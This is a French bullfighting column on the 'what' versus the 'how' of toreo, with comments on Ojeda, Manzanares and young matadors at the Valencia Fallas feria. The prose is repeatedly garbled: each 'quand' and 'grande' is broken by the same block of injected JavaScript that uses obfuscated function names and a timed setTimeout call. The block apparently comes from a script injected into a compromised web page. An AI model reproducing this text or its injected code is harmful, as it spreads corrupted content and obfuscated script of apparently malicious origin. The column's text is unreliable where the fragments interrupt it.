AU COMPAS

LE « QUOI » ET LE « COMMENT »

Une chose c’est ce que l’on fait au toro et une autre chose bien différente c’est comment on le fait. Le quoi est substantif, le comment adjectif. En principe, le substantiel semble supérieur à la manière. Par exemple, quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Paco Ojeda pénétrait dans les terrains du toro, il devenait le mât du toreo et faisait tourner le toro telle une orbite autour de sa personne dans un sens et dans l’autre, enchaînant les charges sur les deux cornes, brisant les lois de la physique tauromachique et créant le toreo substantif par essence. Et par exemple, quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and José María Manzanares aimantait la charge à sa muleta et la berçait, transformant sa violence en un calme enivrant, il asseyait les lois de la physique tauromachique et créait le toreo adjectivé par essence.

Pourquoi alors le comment semblait-il supérieur au quoi ? Le toreo est un art miraculeux. Il rend possible l’impossible. Mais c’est aussi un art répétitif. Et quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and un miracle devient possible, il cesse de l’être. Alors surgit quelque chose qui est au-delà du miracle : le tracé. C’est-à-dire, le ciselé, le coup de pinceau, la définition exécutée à la perfection, ou pleine de génie, d’inspiration, mais toujours avec ce dessin magistral qui par sa beauté éblouissante, situe la suerte répétée au-delà du miracle, avec une émotion supérieure à celle provoquée la première fois.

Voila pourquoi le toreo, le bon toreo, ne se répète jamais, il est toujours restauré…et il se renouvelle. Cette réflexion est à la suite de ce qui s’est passé pendant la feria de Fallas, où les jeunes matadors ont réalisé un toreo très substantif- autrement dit, ils ont fait des choses incroyables aux toros- je ne dirai pas que c’était miraculeux, car cela suit la trace marquée par Talavante, mais si très surprenantes et qui a ému le public de Valence.

Je me réfère à deux triomphateurs, Roca Rey et López Simón, auteurs d’une fusion entre torero et taureau franchement inédites, qui légitime leurs respectifs triomphes. Et cependant les hiérarchies entre les toreros n’ont pas été bouleversées au cours de cette féria, qui mesure toujours les capacités des toreros en cette nouvelle saison. Car les toreros consacrés se sont exprimés avec un trait bien supérieur à celui des jeunes –Perera, Talavante-  avec un autre torero de haut rang, au toreo esthétique et miraculeux, détenant le quoi et le comment –El Juli- alors que deux autres vétérans –Curro Díaz et Paco Ureña- ont fait, par la beauté de leur gestuelle, le meilleur toreo de la feria. Les jeunes pousses n’inquiètent-ils donc pas, pour l’instant, les maestros ? Si ils le feront, quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Roca Rey s’entêtera davantage à toréer qu’à foncer. Et aussi quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and un autre triomphateur des Fallas, Ginés Marín, aura face à lui un toro vraiment brave dans une grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande arène. Ce jeune torero détient lui aussi le secret du quoi et du comment.

Les commentaires sont fermés.